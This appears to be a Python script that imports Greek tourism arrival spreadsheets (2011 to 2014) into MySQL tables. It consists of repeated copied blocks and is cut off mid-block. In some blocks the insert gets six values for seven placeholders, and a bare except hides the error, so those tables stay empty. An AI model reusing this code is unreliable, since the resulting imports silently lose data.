| 48.272331 | 182 | 0.622151 | 2,311 | 22,157 | 5.947642 | 0.116833 | 0.023936 | 0.043288 | 0.023572 | 0.876319 | 0.849036 | 0.835213 | 0.828883 | 0.821244 | 0.795126 | 0 | 0.010597 | 0.271697 | 22,157 | 458 | 183 | 48.377729 | 0.841172 | 0.382046 | 0 | 0.716049 | 0 | 0.00823 | 0.033809 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.024691 | false | 0 | 0.016461 | 0 | 0.065844 | 0.016461 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e8b05aec661978384643afc0a1c4e1ed288c4b91 | 56,707 | py | Python | meso_excel_to_mysql.py | GiannisProkopiou/Python-GreeceArrivals | da4521d86987cd5f468681698e8ec90beaca4fd0 | [
"MIT"
] | null | null | null | meso_excel_to_mysql.py | GiannisProkopiou/Python-GreeceArrivals | da4521d86987cd5f468681698e8ec90beaca4fd0 | [
"MIT"
] | null | null | null | meso_excel_to_mysql.py | GiannisProkopiou/Python-GreeceArrivals | da4521d86987cd5f468681698e8ec90beaca4fd0 | [
"MIT"
] | null | null | null | import openpyxl
import xlrd
import MySQLdb
import mysql.connector
def meso_excel_to_mysql():
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2011_a.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΜΑΡ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the data base
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2011_a(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2011_a( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
# Create a For loop to iterate through each row in the XLS file, starting at row 2 to skip the headers
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car, total)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select Given
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2011_a")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
# Print Insterted
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2011_b.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΙΟΥΝ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the data base
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2011_b(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2011_b( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
# Create a For loop to iterate through each row in the XLS file, starting at row 2 to skip the headers
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car, total )
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select Given
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2011_b")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
# Print Insterted
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2011_c.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΣΕΠ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the data base
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2011_c(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2011_c( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
# Create a For loop to iterate through each row in the XLS file, starting at row 2 to skip the headers
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car, total)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select Given
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2011_c")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
# Print Insterted
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2011_d.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΔΕΚ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the data base
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2011_d(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2011_d( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
# Create a For loop to iterate through each row in the XLS file, starting at row 2 to skip the headers
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car, total)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select Given
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2011_d")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
# Print Insterted
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2012_a.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΜΑΡ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the data base
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2012_a(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2012_a( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
# Create a For loop to iterate through each row in the XLS file, starting at row 2 to skip the headers
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car, total)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select Given
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2012_a")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
# Print Insterted
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2012_b.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΙΟΥΝ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the data base
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2012_b(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2012_b( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
# Create a For loop to iterate through each row in the XLS file, starting at row 2 to skip the headers
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select Given
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2012_b")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
# Print Insterted
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2012_c.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΣΕΠΤ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the data base
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2012_c(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2012_c( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
# Create a For loop to iterate through each row in the XLS file, starting at row 2 to skip the headers
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car, total)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select Given
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2012_c")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
# Print Insterted
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2012_d.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΔΕΚ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the data base
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2012_d(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2012_d( number , nation, plane, train, ship, car, total ) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
# Create a For loop to iterate through each row in the XLS file, starting at row 2 to skip the headers
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car, total)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select Given
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2012_d")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
# Print Insterted
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2013_a.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΜΑΡ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the data base
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2013_a(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2013_a( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
# Create a For loop to iterate through each row in the XLS file, starting at row 2 to skip the headers
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select Given
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2013_a")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
# Print Insterted
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2013_b.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΙΟΥΝ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the data base
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2013_b(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2013_b( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
# Create a For loop to iterate through each row in the XLS file, starting at row 2 to skip the headers
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select Given
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2013_b")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
# Print Insterted
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2013_c.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΣΕΠ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the data base
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2013_c(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2013_c( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
# Create a For loop to iterate through each row in the XLS file, starting at row 2 to skip the headers
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car, total)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select Given
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2013_c")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
# Print Insterted
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2013_d.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΔΕΚ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the data base
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2013_d(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2013_d( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
# Create a For loop to iterate through each row in the XLS file, starting at row 2 to skip the headers
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car, total)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select Given
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2013_d")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
# Print Insterted
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2014_a.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΜΑΡ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the data base
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2014_a(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2014_a( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
# Create a For loop to iterate through each row in the XLS file, starting at row 2 to skip the headers
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car, total)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select Given
mycursor.execute("SELECT number, nation, plane, train, ship, car,total FROM meso_2014_a")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
# Print Insterted
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2014_b.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΙΟΥΝ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the data base
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2014_b(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2014_b( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
# Create a For loop to iterate through each row in the XLS file, starting at row 2 to skip the headers
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
